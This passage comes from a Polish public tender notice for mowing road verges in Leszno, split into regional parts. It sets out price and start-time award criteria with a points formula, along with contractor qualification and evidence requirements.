skrócenie przystąpienia do koszenia w stosunku do terminu określonego przez Zamawiajacego w Rozdziale IV ust. 3 SWZ, tj. skrócenie o wskazaną liczbę dni roboczych, licząc od dnia zlecenia Zamawiającego do przystąpienia do wykonania koszenia.<br/>W ramach niniejszego kryterium punkty zostaną przyznane w następujący sposób:<br/>	0 pkt -	skrócenie czasu rozpoczęcia koszenia o 1 dzień roboczy (tj. rozpoczęcie koszenia 4 dni od dnia zlecenia koszenia przez Zamawiajacego);<br/>	20 pkt - skrócenie czasu rozpoczęcia koszenia o 2 dni robocze (tj. rozpoczęcie koszenia 3 dni od dnia zlecenia koszenia przez Zamawiajacego);<br/>	40 pkt - skrócenie czasu rozpoczęcia koszenia o 3 dni robocze (tj. rozpoczęcie koszenia 2 dni od dnia zlecenia koszenia przez Zamawiajacego);<br/>a)	Ocena w ramach przedmiotowego kryterium zostanie dokonana w oparciu o informacje podane przez Wykonawcę w Formularzu ofertowym (Załącznik Nr 1 do SWZ). Wykonawca winien zaznaczyć w Formularzu ofertowym jedną z wyżej wymienionych możliwości. <br/>b)	W przypadku jeżeli Wykonawca nie zaznaczy żadnego z powyższych, Zamawiający przyjmie zgodnie z Rozdziałem IV SWZ – 5 dniowy termin rozpoczęcia świadczenia usługi, liczony od daty pisemnego zlecenia wykonania koszenia, przyznając Wykonawcy w przedmiotowym kryterium 0 punktów.<br/>UWAGA!<br/>Zadeklarowany w Formularzu ofertowym czas rozpoczęcia koszenia będzie wiążący na etapie realizacji umowy. Nie wywiązanie się Wykonawcy z zadeklarowanego, skróconego terminu rozpoczęcia koszenia będzie podlegało naliczeniu kary umownej, o której mowa w projekcie umowy wg Załącznika nr 6 do SWZ.<br/>3. Zamawiający udzieli zamówienia Wykonawcy, którego oferta uzyska największą ilość punktów (P) obliczonych zgodnie z powyższymi zasadami wg wzoru: P = Pc + Pcz, i odpowiada wszystkim wymaganiom przedstawionym w ustawie – Prawo zamówień publicznych oraz niniejszej SWZ.<br/>4. Na podstawie powyższych kryteriów zostanie sporządzone zbiorcze zestawienie oceny ofert. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa suma punktów uzyskanych w poszczególnych kryteriach wyznaczy najkorzystniejszą ofertę.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie Pzp, oraz w niniejszej SWZ <br/>i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br/>6. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie czasu rozpoczęcia koszeń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest koszenie traw i chwastów w pasach drogowych dróg powiatowych i gminnych na terenie miasta Leszna wraz z wywiezieniem i utylizacją powstałych przy wykaszaniu odpadów.<br/>2. Część III – obejmuje Rejon C (Leszczynko, Zaborowo).<br/>3. UWAGA! Dla każdego zadania wskazanego powyżej wymagane jest posiadanie osobnego sprzętu w ilości niezbędnej do właściwej realizacji zadania dla danej części przedmiotu zamówienia. Zamawiający wymaga równoczesnego wykonywania zamówienia na poszczególnych zadaniach.<br/>4. Szczegółowy zakres przedmiotu zamówienia został wskazany w Załączniku nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77314100-5 - Usługi w zakresie trawników</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Najkorzystniejszą ofertą, będzie oferta, która przedstawia najkorzystniejszy bilans kryteriów oceny ofert, odnoszących się do przedmiotu zamówienia.<br/>2. Zamawiający dla każdej części przedmiotu zamówienia dokona wyboru oferty najkorzystniejszej w oparciu o następujące kryteria oceny ofert: <br/>1) Najniższa cena ofertowa brutto (Pc) – waga kryterium to 60 pkt.<br/>W przedmiotowym kryterium oceniana będzie cena ofertowa brutto, podana przez Wykonawcę w Formularzu ofertowym (Załącznik Nr 1 do SWZ). Maksymalną liczbę punktów otrzyma oferta z najniższą ceną ofertową (60 pkt). Pozostałe oferty zostaną ocenione wg następującego wzoru:<br/>Pc = (Cn/Cb) x 60 [pkt]<br/>gdzie:<br/> Pc	– oznacza punkty w kryterium „Najniższa cena ofertowa brutto”<br/> Cn	– oznacza najniższą oferowaną cenę brutto spośród ofert niepodlegających odrzuceniu<br/> Cb	– oznacza cenę brutto badanej oferty.<br/>2) Skrócenie czasu rozpoczęcia koszeń (Pcz) – waga kryterium 40 pkt.<br/>W przedmiotowym kryterium ocenie podlegać będzie skrócenie przystąpienia do koszenia w stosunku do terminu określonego przez Zamawiajacego w Rozdziale IV ust. 3 SWZ, tj. skrócenie o wskazaną liczbę dni roboczych, licząc od dnia zlecenia Zamawiającego do przystąpienia do wykonania koszenia.<br/>W ramach niniejszego kryterium punkty zostaną przyznane w następujący sposób:<br/>	0 pkt -	skrócenie czasu rozpoczęcia koszenia o 1 dzień roboczy (tj. rozpoczęcie koszenia 4 dni od dnia zlecenia koszenia przez Zamawiajacego);<br/>	20 pkt - skrócenie czasu rozpoczęcia koszenia o 2 dni robocze (tj. rozpoczęcie koszenia 3 dni od dnia zlecenia koszenia przez Zamawiajacego);<br/>	40 pkt - skrócenie czasu rozpoczęcia koszenia o 3 dni robocze (tj. rozpoczęcie koszenia 2 dni od dnia zlecenia koszenia przez Zamawiajacego);<br/>a)	Ocena w ramach przedmiotowego kryterium zostanie dokonana w oparciu o informacje podane przez Wykonawcę w Formularzu ofertowym (Załącznik Nr 1 do SWZ). Wykonawca winien zaznaczyć w Formularzu ofertowym jedną z wyżej wymienionych możliwości. <br/>b)	W przypadku jeżeli Wykonawca nie zaznaczy żadnego z powyższych, Zamawiający przyjmie zgodnie z Rozdziałem IV SWZ – 5 dniowy termin rozpoczęcia świadczenia usługi, liczony od daty pisemnego zlecenia wykonania koszenia, przyznając Wykonawcy w przedmiotowym kryterium 0 punktów.<br/>UWAGA!<br/>Zadeklarowany w Formularzu ofertowym czas rozpoczęcia koszenia będzie wiążący na etapie realizacji umowy. Nie wywiązanie się Wykonawcy z zadeklarowanego, skróconego terminu rozpoczęcia koszenia będzie podlegało naliczeniu kary umownej, o której mowa w projekcie umowy wg Załącznika nr 6 do SWZ.<br/>3. Zamawiający udzieli zamówienia Wykonawcy, którego oferta uzyska największą ilość punktów (P) obliczonych zgodnie z powyższymi zasadami wg wzoru: P = Pc + Pcz, i odpowiada wszystkim wymaganiom przedstawionym w ustawie – Prawo zamówień publicznych oraz niniejszej SWZ.<br/>4. Na podstawie powyższych kryteriów zostanie sporządzone zbiorcze zestawienie oceny ofert. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa suma punktów uzyskanych w poszczególnych kryteriach wyznaczy najkorzystniejszą ofertę.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie Pzp, oraz w niniejszej SWZ <br/>i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br/>6. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie czasu rozpoczęcia koszeń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest koszenie traw i chwastów w pasach drogowych dróg powiatowych i gminnych na terenie miasta Leszna wraz z wywiezieniem i utylizacją powstałych przy wykaszaniu odpadów.<br/>2. Część IV – obejmuje Rejon D (Przyjaźni, Przylesie).<br/>3. UWAGA! Dla każdego zadania wskazanego powyżej wymagane jest posiadanie osobnego sprzętu w ilości niezbędnej do właściwej realizacji zadania dla danej części przedmiotu zamówienia. Zamawiający wymaga równoczesnego wykonywania zamówienia na poszczególnych zadaniach.<br/>4. Szczegółowy zakres przedmiotu zamówienia został wskazany w Załączniku nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77314100-5 - Usługi w zakresie trawników</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Najkorzystniejszą ofertą, będzie oferta, która przedstawia najkorzystniejszy bilans kryteriów oceny ofert, odnoszących się do przedmiotu zamówienia.<br/>2. Zamawiający dla każdej części przedmiotu zamówienia dokona wyboru oferty najkorzystniejszej w oparciu o następujące kryteria oceny ofert: <br/>1) Najniższa cena ofertowa brutto (Pc) – waga kryterium to 60 pkt.<br/>W przedmiotowym kryterium oceniana będzie cena ofertowa brutto, podana przez Wykonawcę w Formularzu ofertowym (Załącznik Nr 1 do SWZ). Maksymalną liczbę punktów otrzyma oferta z najniższą ceną ofertową (60 pkt). Pozostałe oferty zostaną ocenione wg następującego wzoru:<br/>Pc = (Cn/Cb) x 60 [pkt]<br/>gdzie:<br/> Pc	– oznacza punkty w kryterium „Najniższa cena ofertowa brutto”<br/> Cn	– oznacza najniższą oferowaną cenę brutto spośród ofert niepodlegających odrzuceniu<br/> Cb	– oznacza cenę brutto badanej oferty.<br/>2) Skrócenie czasu rozpoczęcia koszeń (Pcz) – waga kryterium 40 pkt.<br/>W przedmiotowym kryterium ocenie podlegać będzie skrócenie przystąpienia do koszenia w stosunku do terminu określonego przez Zamawiajacego w Rozdziale IV ust. 3 SWZ, tj. skrócenie o wskazaną liczbę dni roboczych, licząc od dnia zlecenia Zamawiającego do przystąpienia do wykonania koszenia.<br/>W ramach niniejszego kryterium punkty zostaną przyznane w następujący sposób:<br/>	0 pkt -	skrócenie czasu rozpoczęcia koszenia o 1 dzień roboczy (tj. rozpoczęcie koszenia 4 dni od dnia zlecenia koszenia przez Zamawiajacego);<br/>	20 pkt - skrócenie czasu rozpoczęcia koszenia o 2 dni robocze (tj. rozpoczęcie koszenia 3 dni od dnia zlecenia koszenia przez Zamawiajacego);<br/>	40 pkt - skrócenie czasu rozpoczęcia koszenia o 3 dni robocze (tj. rozpoczęcie koszenia 2 dni od dnia zlecenia koszenia przez Zamawiajacego);<br/>a)	Ocena w ramach przedmiotowego kryterium zostanie dokonana w oparciu o informacje podane przez Wykonawcę w Formularzu ofertowym (Załącznik Nr 1 do SWZ). Wykonawca winien zaznaczyć w Formularzu ofertowym jedną z wyżej wymienionych możliwości. <br/>b)	W przypadku jeżeli Wykonawca nie zaznaczy żadnego z powyższych, Zamawiający przyjmie zgodnie z Rozdziałem IV SWZ – 5 dniowy termin rozpoczęcia świadczenia usługi, liczony od daty pisemnego zlecenia wykonania koszenia, przyznając Wykonawcy w przedmiotowym kryterium 0 punktów.<br/>UWAGA!<br/>Zadeklarowany w Formularzu ofertowym czas rozpoczęcia koszenia będzie wiążący na etapie realizacji umowy. Nie wywiązanie się Wykonawcy z zadeklarowanego, skróconego terminu rozpoczęcia koszenia będzie podlegało naliczeniu kary umownej, o której mowa w projekcie umowy wg Załącznika nr 6 do SWZ.<br/>3. Zamawiający udzieli zamówienia Wykonawcy, którego oferta uzyska największą ilość punktów (P) obliczonych zgodnie z powyższymi zasadami wg wzoru: P = Pc + Pcz, i odpowiada wszystkim wymaganiom przedstawionym w ustawie – Prawo zamówień publicznych oraz niniejszej SWZ.<br/>4. Na podstawie powyższych kryteriów zostanie sporządzone zbiorcze zestawienie oceny ofert. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa suma punktów uzyskanych w poszczególnych kryteriach wyznaczy najkorzystniejszą ofertę.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie Pzp, oraz w niniejszej SWZ <br/>i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br/>6. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie czasu rozpoczęcia koszeń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest koszenie traw i chwastów w pasach drogowych dróg powiatowych i gminnych na terenie miasta Leszna wraz z wywiezieniem i utylizacją powstałych przy wykaszaniu odpadów.<br/>2. Część V – obejmuje Rejon E (Zatorze, Międzytorze).<br/>3. UWAGA! Dla każdego zadania wskazanego powyżej wymagane jest posiadanie osobnego sprzętu w ilości niezbędnej do właściwej realizacji zadania dla danej części przedmiotu zamówienia. Zamawiający wymaga równoczesnego wykonywania zamówienia na poszczególnych zadaniach.<br/>4. Szczegółowy zakres przedmiotu zamówienia został wskazany w Załączniku nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77314100-5 - Usługi w zakresie trawników</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Najkorzystniejszą ofertą, będzie oferta, która przedstawia najkorzystniejszy bilans kryteriów oceny ofert, odnoszących się do przedmiotu zamówienia.<br/>2. Zamawiający dla każdej części przedmiotu zamówienia dokona wyboru oferty najkorzystniejszej w oparciu o następujące kryteria oceny ofert: <br/>1) Najniższa cena ofertowa brutto (Pc) – waga kryterium to 60 pkt.<br/>W przedmiotowym kryterium oceniana będzie cena ofertowa brutto, podana przez Wykonawcę w Formularzu ofertowym (Załącznik Nr 1 do SWZ). Maksymalną liczbę punktów otrzyma oferta z najniższą ceną ofertową (60 pkt). Pozostałe oferty zostaną ocenione wg następującego wzoru:<br/>Pc = (Cn/Cb) x 60 [pkt]<br/>gdzie:<br/> Pc	– oznacza punkty w kryterium „Najniższa cena ofertowa brutto”<br/> Cn	– oznacza najniższą oferowaną cenę brutto spośród ofert niepodlegających odrzuceniu<br/> Cb	– oznacza cenę brutto badanej oferty.<br/>2) Skrócenie czasu rozpoczęcia koszeń (Pcz) – waga kryterium 40 pkt.<br/>W przedmiotowym kryterium ocenie podlegać będzie skrócenie przystąpienia do koszenia w stosunku do terminu określonego przez Zamawiajacego w Rozdziale IV ust. 3 SWZ, tj. skrócenie o wskazaną liczbę dni roboczych, licząc od dnia zlecenia Zamawiającego do przystąpienia do wykonania koszenia.<br/>W ramach niniejszego kryterium punkty zostaną przyznane w następujący sposób:<br/>	0 pkt -	skrócenie czasu rozpoczęcia koszenia o 1 dzień roboczy (tj. rozpoczęcie koszenia 4 dni od dnia zlecenia koszenia przez Zamawiajacego);<br/>	20 pkt - skrócenie czasu rozpoczęcia koszenia o 2 dni robocze (tj. rozpoczęcie koszenia 3 dni od dnia zlecenia koszenia przez Zamawiajacego);<br/>	40 pkt - skrócenie czasu rozpoczęcia koszenia o 3 dni robocze (tj. rozpoczęcie koszenia 2 dni od dnia zlecenia koszenia przez Zamawiajacego);<br/>a)	Ocena w ramach przedmiotowego kryterium zostanie dokonana w oparciu o informacje podane przez Wykonawcę w Formularzu ofertowym (Załącznik Nr 1 do SWZ). Wykonawca winien zaznaczyć w Formularzu ofertowym jedną z wyżej wymienionych możliwości. <br/>b)	W przypadku jeżeli Wykonawca nie zaznaczy żadnego z powyższych, Zamawiający przyjmie zgodnie z Rozdziałem IV SWZ – 5 dniowy termin rozpoczęcia świadczenia usługi, liczony od daty pisemnego zlecenia wykonania koszenia, przyznając Wykonawcy w przedmiotowym kryterium 0 punktów.<br/>UWAGA!<br/>Zadeklarowany w Formularzu ofertowym czas rozpoczęcia koszenia będzie wiążący na etapie realizacji umowy. Nie wywiązanie się Wykonawcy z zadeklarowanego, skróconego terminu rozpoczęcia koszenia będzie podlegało naliczeniu kary umownej, o której mowa w projekcie umowy wg Załącznika nr 6 do SWZ.<br/>3. Zamawiający udzieli zamówienia Wykonawcy, którego oferta uzyska największą ilość punktów (P) obliczonych zgodnie z powyższymi zasadami wg wzoru: P = Pc + Pcz, i odpowiada wszystkim wymaganiom przedstawionym w ustawie – Prawo zamówień publicznych oraz niniejszej SWZ.<br/>4. Na podstawie powyższych kryteriów zostanie sporządzone zbiorcze zestawienie oceny ofert. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa suma punktów uzyskanych w poszczególnych kryteriach wyznaczy najkorzystniejszą ofertę.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie Pzp, oraz w niniejszej SWZ <br/>i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br/>6. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie czasu rozpoczęcia koszeń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4)	zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności zawodowej, jeżeli wykaże, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, minimum jedną usługę polegającą na przeprowadzeniu cyklicznego wykaszania terenu zieleni wraz z wywiezieniem i utylizacją powstałych odpadów, na powierzchni minimum: <br/>- dla Części I – Rejon A – 10 000 m2 łącznie, <br/>- dla Części II – Rejon B - 15 000 m2 łącznie,<br/>- dla Części III – Rejon C – 10 000 m2 łącznie,<br/>- dla Części IV – Rejon D – 10 000 m2 łącznie,<br/>- dla Części V – Rejon E – 15 000 m2 łącznie.<br/>Uwaga:<br/>W przypadku składania oferty na więcej niż jedną część przedmiotu zamówienia, Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że wykonał ww. usługi na powierzchni równej sumie części, na którą zamierza złożyć ofertę.<br/><br/>Ponadto Zamawiający zastrzega, iż przez jedno zamówienie rozumie wykonaną usługę koszenia w ramach jednej umowy/ kontraktu/ zlecenia.<br/><br/>Zamawiający wyjaśnia, iż zgodnie z wyrokiem TSUE z 04.05.2017 r. w sprawie C-387/14 Esaprojekt, Wykonawca samodzielnie składający ofertę w postępowaniu, w celu potwierdzenia spełnienia warunku udziału w postępowaniu dotyczącego doświadczenia zawodowego, może polegać na zasobach w postaci doświadczenia grupy Wykonawców (Konsorcjum), której był członkiem przy realizacji innego zamówienia, jeżeli faktycznie i konkretnie uczestniczył w jego realizacji.<br/><br/>Zamawiający zastrzega, iż w przypadku złożenia oferty w Konsorcjum przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w celu wykazania spełniania warunku udziału w postępowaniu dot. doświadczenia zawodowego, dopuszcza możliwość łączenia potencjału kilku Wykonawców, który sumowany łącznie pozwala wykazać fakt spełniania warunku dot. doświadczenia zawodowego, opisanego powyżej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu: a) odpisu lub informacji z Krajowego Rejestru Sądowego lub<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. Zamawiający w celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu na podstawie art. 109 ust. 1 pkt 4) ustawy Pzp skorzysta z dokumentów znajdujących się w ogólnodostępnych i bezpłatnych bazach danych, pod warunkiem wskazania przez<br/>Wykonawcę w oświadczeniu, o którym mowa w Rozdziale VII ust. 1 SWZ (Załącznik nr 2 do SWZ), danych umożliwiających dostęp do<br/>tych dokumentów. 2. Dokumenty podmiotów zagranicznych: 1) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce<br/>zamieszkania ma osoba, której dotyczy informacja albo dokument poza granicami Rzeczypospolitej Polskiej, zamiast dokumentów, o<br/>których mowa w Rozdziale VII ust. 2 pkt 2.2 lit. a) SWZ:<br/>a) składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce<br/>zamieszkania ma osoba, której dokument dotyczy, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono<br/>upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury – wystawione nie wcześniej niż 3 miesięcy przed ich złożeniem. 2)Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się<br/>dokumentów, o których mowa powyżej, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108<br/>ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1, 2 lit. a i b oraz pkt 3 ustawy Pzp, zastępuje się je odpowiednio w całości lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym<br/>Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania osoby, której dokument miał dotyczyć. Dokumenty, o których mowa w zdaniach poprzedzających powinny być<br/>wystawione w terminach odpowiednich dla dokumentów wymienionych powyżej. 3. Dokumenty podmiotów udostępniających<br/>zasoby: 1) Zamawiający żąda od Wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej<br/>lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp, przedstawienia<br/>podmiotowych środków dowodowych, o których mowa w Rozdziale VII ust. 2 pkt 2.2 lit. a) SWZ, dotyczących tych podmiotów,<br/>potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania. Zamawiający, w 